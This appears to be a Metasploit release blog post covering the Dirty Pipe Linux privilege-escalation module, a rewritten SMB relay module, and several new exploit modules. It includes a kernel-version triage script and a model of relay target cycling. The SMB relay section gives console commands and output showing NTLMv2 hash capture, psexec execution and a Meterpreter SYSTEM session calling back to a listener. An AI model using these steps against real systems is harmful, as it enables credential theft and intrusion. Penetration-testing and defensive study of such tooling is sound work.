Last updated at Mon, 05 Feb 2024 21:44:02 GMT
Mucking out the pipes.
Thanks to some quick work by timwr, CVE-2022-0847, aka "Dirty Pipe", gives Metasploit a bit of digital plumber's training. The exploit targets modern Linux 5.x kernels (5.8 and later, before the fixes that landed upstream in 5.16.11, 5.15.25 and 5.10.102) and elevates privileges by overwriting a SUID binary of your choice, plunging some payload gold through a pipe. The overwrite lands in the page cache rather than on disk, which is part of what makes the technique so quick and quiet.
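A quick triage helper, added here as an example and not taken from the Metasploit module's own check method: it classifies a kernel release string against the Dirty Pipe version window. The only facts it relies on are the ones above (affected from 5.8, fixed upstream in 5.16.11, 5.15.25 and 5.10.102, with 5.17 and later released after the fix); everything else, including the function names, is this example's own.

```ruby
# Added example (not the Metasploit module's own check code): classify a Linux
# kernel release string against the CVE-2022-0847 "Dirty Pipe" window.
# Affected: 5.8 and later. Fixed upstream in 5.16.11, 5.15.25 and 5.10.102;
# 5.17 and newer were released after the fix.

DIRTY_PIPE_FIRST_VULN = [5, 8, 0].freeze

# Stable branch => first release on that branch carrying the fix.
DIRTY_PIPE_FIXED = {
  [5, 10] => [5, 10, 102],
  [5, 15] => [5, 15, 25],
  [5, 16] => [5, 16, 11]
}.freeze

# Parse "5.15.25-generic", "5.10.0-13-amd64" or "5.8" into [major, minor, patch].
# Returns nil for anything that does not start with a dotted version so callers
# can report :unknown instead of guessing.
def parse_kernel_version(release)
  m = release.to_s.match(/\A(\d+)\.(\d+)(?:\.(\d+))?/)
  return nil unless m

  [m[1].to_i, m[2].to_i, (m[3] || 0).to_i]
end

# Returns :vulnerable, :safe or :unknown, judging by upstream version only.
def dirty_pipe_status(release)
  v = parse_kernel_version(release)
  return :unknown if v.nil?
  return :safe if (v <=> DIRTY_PIPE_FIRST_VULN) < 0    # older than 5.8
  return :safe if v[0] > 5 || (v[0] == 5 && v[1] > 16) # 5.17+ shipped fixed

  fixed = DIRTY_PIPE_FIXED[v[0, 2]]
  if fixed
    (v <=> fixed) < 0 ? :vulnerable : :safe
  else
    # 5.8, 5.9 and 5.11..5.14 reached end of life before the fix, so no
    # upstream point release on those branches is patched.
    :vulnerable
  end
end

# Convenience wrapper for the host this script runs on.
def local_dirty_pipe_status
  dirty_pipe_status(`uname -r`)
rescue SystemCallError
  :unknown
end

if __FILE__ == $PROGRAM_NAME
  puts "local kernel: #{local_dirty_pipe_status}"
end
```

Treat :vulnerable as "worth trying", not proof: distribution kernels backport the fix without bumping the upstream version, so a patched distro kernel that still reports a 5.13 or 5.4-style release string will be flagged here. The module's own check against the running target is what actually counts.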
Long live the SMB relay!
SMB, that magical ubiquitous service making all that noise on networks, just got even more fun. With the latest updates by adfoster-r7, the windows/smb/smb_relay module, which had been languishing in disuse as the protocol evolved, is now more useful than ever. Users can relay over SMB versions 2 and 3, and can select multiple targets that Metasploit will cycle through intelligently so that incoming connections are not wasted.
Example module usage:
use windows/smb/smb_relay
set RELAY_TARGETS 192.168.123.4 192.168.123.25
set JOHNPWFILE ./relay_results.txt
run
Incoming requests have their NTLMv2 hashes captured (written to JOHNPWFILE for offline cracking) as well as being relayed to the configured targets to run psexec:
msf6 exploit(windows/smb/smb_relay) > [*] New request from 192.168.123.22
[*] Received request for \admin
[*] Relaying to next target smb://192.168.123.4:445
[+] identity: \admin - Successfully authenticated against relay target smb://192.168.123.4:445
[SMB] NTLMv2-SSP Client : 192.168.123.4
[SMB] NTLMv2-SSP Username : \admin
[SMB] NTLMv2-SSP Hash : admin:::ecedb28bc70302ee:a88c85e87f7dca568c560a49a01b0af8:...
[*] Received request for \admin
[*] identity: \admin - All targets relayed to
[*] 192.168.123.4:445 - Selecting PowerShell target
[*] Received request for \admin
[*] identity: \admin - All targets relayed to
[*] 192.168.123.4:445 - Executing the payload...
[+] 192.168.123.4:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (175174 bytes) to 192.168.123.4
[*] Meterpreter session 1 opened (192.168.123.1:4444 -> 192.168.123.4:52771) at 2022-03-02 22:24:42 +0000
A session will be opened on the relay target with the associated credentials:
msf6 exploit(windows/smb/smb_relay) > sessions

Active sessions
===============

  Id  Name  Type                     Information                            Connection
  --  ----  ----                     -----------                            ----------
  1         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ DESKTOP-N3MAG5R  192.168.123.1:4444 -> 192.168.123.4:52771 (192.168.123.4)
Further details can be found in the Metasploit SMB Relay documentation.
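To make the multi-target behaviour concrete, here is a small model of it written for this post; it is not code from the smb_relay module, and the class and method names are this example's own. It tracks, per inbound identity, which RELAY_TARGETS have already been attempted, hands the next untried one to the relay logic, and answers "all targets relayed to" once the list is exhausted, which is why a later connection from the same identity is not burned on a repeat. Hosts default to port 445, matching the smb://host:445 lines in the log above.

```ruby
# Added example, not code from the smb_relay module: a model of the
# multi-target cycling described in the post. Target hosts default to 445.

class RelayTargetSelector
  Target = Struct.new(:host, :port) do
    def to_s
      "smb://#{host}:#{port}"
    end
  end

  def initialize(targets)
    @targets = targets.map do |spec|
      host, port = spec.split(':')
      Target.new(host, (port || 445).to_i)
    end
    # identity => { Target => :success | :failed }
    @state = Hash.new { |h, k| h[k] = {} }
  end

  # Next target not yet attempted for this identity, or nil when none remain.
  def next_target(identity)
    @targets.find { |t| !@state[identity].key?(t) }
  end

  def all_relayed?(identity)
    next_target(identity).nil?
  end

  # Targets this identity successfully authenticated against.
  def successes(identity)
    @state[identity].select { |_, r| r == :success }.keys
  end

  # Process one inbound authentication for +identity+. The block stands in for
  # the actual relay attempt and must return true on success, false when the
  # target rejects the credentials (wrong domain, signing required, etc.).
  # Returns [outcome, target] so the caller can log it.
  def handle_request(identity)
    target = next_target(identity)
    return [:all_targets_relayed, nil] if target.nil?

    ok = yield(target)
    @state[identity][target] = ok ? :success : :failed
    [ok ? :relayed : :failed, target]
  end
end

# Constructed walk-through mirroring the log above: \admin is accepted by
# 192.168.123.4, rejected by 192.168.123.25, and every later connection is
# told that all targets have been relayed to.
def demo_relay_cycle
  sel = RelayTargetSelector.new(%w[192.168.123.4 192.168.123.25])
  identity = '\\admin'
  outcomes = []
  3.times do
    outcomes << sel.handle_request(identity) { |t| t.host == '192.168.123.4' }
  end
  outcomes.map { |outcome, target| target ? "#{outcome} #{target}" : outcome.to_s }
end

puts demo_relay_cycle if __FILE__ == $PROGRAM_NAME
```

The per-identity bookkeeping is the point: a second machine account or user hitting the listener still gets a full pass over the target list, while an identity that has already been tried everywhere is not relayed again.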
Return of the GSoC!
The Metasploit project is proud to return to Google Summer of Code for 2022. Contributor applications will open April 4th and close April 19th. Changes this year open the program up to all newcomers to open source who are 18 years and older. Join us on Slack and check out our How-To and Ideas pages to get started. We are still expanding on ideas and are eager to see what you'd like to add to Metasploit.
New module content (5)
- WordPress MasterStudy Admin Account Creation by Numan Türle and h00die, which exploits CVE-2022-0441 - This adds an auxiliary module that leverages a sanitization issue in the WordPress plugin MasterStudy to create an admin account in WordPress.
- Dirty Pipe Local Privilege Escalation via CVE-2022-0847 by Max Kellermann and timwr, which exploits CVE-2022-0847 - This exploits a privilege escalation vulnerability in the Linux kernel starting with version 5.8. The module leverages the vulnerability to overwrite an SUID binary in order to gain privileges as the root user.
- APISIX Admin API default access token RCE by Heyder Andrade and YuanSheng Wang, which exploits CVE-2022-24112 - This adds an unauthenticated exploit targeting Apache APISIX. It leverages two vulnerabilities: the first is a default API key and the second is an IP restriction bypass. The result is OS command execution as the service user.
- pfSense Diag Routes Web Shell Upload by Abdel Adim "smaury" Oisfi of Shielder and jbaines-r7, which exploits CVE-2021-41282 - This adds a module that exploits an authenticated arbitrary file creation vulnerability in the pfSense HTTP interface.
- SMB Relay Rewrite from adfoster-r7 - Updates the SMB relay module to support relaying to targets over SMB 2 and SMB 3. It also adds intelligent targeting for multiple hosts, so if the incoming authentication information is incompatible with one target, the next target host is tried.
Enhancements and features
- #16135 from sjanusz-r7 - This adds support for logging Meterpreter's TLV packets with `setg SessionTlvLogging true`. Other values for the `SessionTlvLogging` option include `console`, `false`, and `file:<file_location>`.
- #16141 from adfoster-r7 - This adds service manager commands to `msfconsole`.
- #16219 from sjanusz-r7 - This updates the packet inspection for the `enumextcmd` and `loadlib` commands to log human readable string identifiers in addition to the integer command ids that were introduced as part of Metasploit 6.
- #16258 from sjanusz-r7 - This improves Meterpreter's TLV logging support to show human readable names for the Meterpreter TLV values. To view this functionality, run `setg SessionTlvLogging true` with a Meterpreter session open, then run a Meterpreter command such as `dir`.
- #16269 from bcoles - This improves validation for Android payloads to verify that Java is correctly installed and that apktool.jar exists in the same directory as apktool.
- #16270 from bcoles - This improves validation for Android payloads to notify the user if a keytool error is present, such as being unable to parse the provided APK file or certificate.
- #16282 from 3V3RYONE - This adds the `lcat` command to Meterpreter, which allows the user to cat a local file.
- #16288 from bcoles - This change displays the output of apktool if that output contains Java exceptions, which is useful for debugging errors in Android APK injection.
Bugs fixed
- #16145 from adfoster-r7 - This fixes a case sensitivity issue with option handling for the `to_handler` command on Metasploit payloads. Previously, setting an `LPORT` value within a payload would not correctly override the previously set `lport` value.
- #16153 from jmartin-r7 - This fixes a bug in the `auxiliary/client/smtp/emailer` module, which previously handled multiline SMTP responses incorrectly, stopping the module from emailing the payload successfully.
- #16265 from smashery - This fixes an edge case which led to a running job being cleaned up twice, causing unintended errors. Now the job is only cleaned up once.
- #16268 from bwatters-r7 - This updates the check method of the `exploit/windows/local/bypassuac_comhijack` module to identify Windows 10 versions 1903 and later as not being affected. This also switches the module to run the check method automatically, which helps inform users whether the target system is vulnerable.
- #16283 from bcoles - This change fixes an error when attempting to inject into an unsigned APK file. A suitable error message is now displayed.
- #16286 from bcoles - This fixes a payload truncation issue in `post/windows/manage/persistence_exe` on Windows systems caused by the usage of `IO.read`, which opens files in text mode on Windows and so mangles binary payloads.
- #16294 from bcoles - This change fixes the Android APK injection functionality of `msfvenom` to use the new signing tool `apksigner` instead of `jarsigner`, which allows the applications to install successfully on the latest version of Android (Android 11).
- #16310 from adfoster-r7 - This fixes an edge case where setting multiple RHOST values for a module which did not support this option would cause the module to run multiple times instead of once.
- #16311 from sjanusz-r7 - This updates msfconsole's search functionality to include the 64-bit variant of the encrypted_shell payload (`windows/x64/encrypted_shell`).
- #16312 from bwatters-r7 - This fixes two issues with the pwnkit exploit for CVE-2021-4034. The first is a compatibility check between the target host architecture and the payload. The second is with the on-session callback that sets the current working directory.
- #16322 from zeroSteiner - This fixes a regression with the `hosts` command's tab completion and the `--search` option's functionality.
Get it
As always, you can update to the latest Metasploit Framework with msfupdate, and you can get more details on the changes since the last blog post from GitHub:
If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).